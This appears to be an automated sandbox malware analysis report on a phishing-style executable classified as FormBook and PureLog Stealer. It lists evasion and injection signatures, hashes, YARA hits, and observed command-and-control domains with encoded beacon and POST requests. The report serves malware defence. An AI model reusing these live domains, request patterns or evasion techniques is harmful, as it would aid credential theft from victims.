Windows Analysis Report
PO -2025918.exe

Overview

General Information

Sample name: PO -2025918.exe
Analysis ID: 1592062
MD5: cb01d48baf8a685f7f8233565e3cbfb7
SHA1: b205be3b958db2891cd2582131ed22d89b37bc07
SHA256: 7365e206478fad792a4c64390b32e1d21b16a5c080a6215eba8498c638877f06
Tags: exeuser-abuse_ch
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PO -2025918.exe Virustotal: Detection: 52% Perma Link
Source: PO -2025918.exe ReversingLabs: Detection: 57%
Yara detected FormBook
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: PO -2025918.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: PO -2025918.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO -2025918.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose, 9_2_00AAC600
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 4x nop then xor eax, eax 9_2_00A99E10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 4x nop then pop edi 9_2_00A9E21E
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 4x nop then mov ebx, 00000004h 9_2_031A04CE

Networking
barindex
Performs DNS queries to domains with low reputation
Source: DNS query: www.letsbookcruise.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View IP Address: 67.223.117.189 67.223.117.189
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zucchini.proUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /54nj/?V0=jQd8/d8A1xfb/FB4a5ld7s51nRiuWU3OCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JhvpvAlNBW96dL3eN6Dv39YB+Yc5uDns7m3I=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vh5g.sbsUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /gq43/?V0=h/dnkFjaM/BlMTbdESaBO4yDKWKmOcDz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOE/Y8+3cOhgXpERP3XxTgx1mSo6tETBq5XpQ=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.actionhub.liveUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.100millionjobs.africaUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.truckgoway.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aloezhealthcare.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic DNS traffic detected: DNS query: www.zucchini.pro
Source: global traffic DNS traffic detected: DNS query: www.vh5g.sbs
Source: global traffic DNS traffic detected: DNS query: www.v89ey584d.shop
Source: global traffic DNS traffic detected: DNS query: www.actionhub.live
Source: global traffic DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic DNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
Source: global traffic DNS traffic detected: DNS query: www.hwak.live
Source: global traffic DNS traffic detected: DNS query: www.qzsazi.info
Source: global traffic DNS traffic detected: DNS query: www.truckgoway.info
Source: global traffic DNS traffic detected: DNS query: www.aloezhealthcare.info
Source: global traffic DNS traffic detected: DNS query: www.letsbookcruise.xyz
Source: unknown HTTP traffic detected: POST /54nj/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeCache-Control: max-age=0Host: www.vh5g.sbsOrigin: http://www.vh5g.sbsReferer: http://www.vh5g.sbs/54nj/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4Data Raw: 56 30 3d 75 53 31 63 38 74 55 50 34 30 66 75 35 54 39 79 64 36 70 42 7a 62 42 6f 67 45 79 59 54 51 32 63 4b 68 79 69 6e 35 67 75 5a 4a 56 7a 36 68 46 34 48 41 76 37 4c 76 34 74 32 4e 74 63 64 64 4a 31 73 41 2b 39 69 59 42 6c 44 76 50 68 6e 4f 64 56 4c 73 39 38 76 73 49 74 42 33 5a 66 5a 2f 6d 45 41 6d 57 6c 2f 67 6a 58 6c 72 64 6d 64 38 6b 36 4b 78 30 66 6f 32 38 79 45 57 72 6f 43 30 6f 69 43 65 63 44 74 48 44 6e 73 31 38 77 34 55 51 71 41 2f 42 62 65 56 52 49 61 32 43 77 78 68 55 55 4e 4f 30 6f 31 54 46 41 62 42 72 53 6f 51 79 4f 41 42 4b 41 36 4c 38 4a 4e 43 34 45 34 41 36 61 52 51 3d 3d Data Ascii: V0=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNO0o1TFAbBrSoQyOABKA6L8JNC4E4A6aRQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:30 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:33 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:35 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:38 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 